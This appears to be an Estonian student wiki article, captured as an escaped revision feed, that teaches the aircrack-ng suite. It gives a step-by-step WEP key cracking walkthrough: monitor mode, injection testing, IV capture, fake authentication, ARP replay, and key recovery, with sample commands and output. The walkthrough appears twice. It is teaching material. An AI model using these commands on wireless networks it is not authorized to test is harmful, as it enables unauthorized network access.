&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89335</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89335"/>
		<updated>2015-05-25T19:59:58Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Sissejuhatus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit demonstreerides üht paljudest näitelahendustest.&lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine&amp;lt;ref&amp;gt;[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks&amp;lt;ref&amp;gt;[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]&amp;lt;/ref&amp;gt;. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt&amp;lt;ref&amp;gt;[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]&amp;lt;/ref&amp;gt;:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
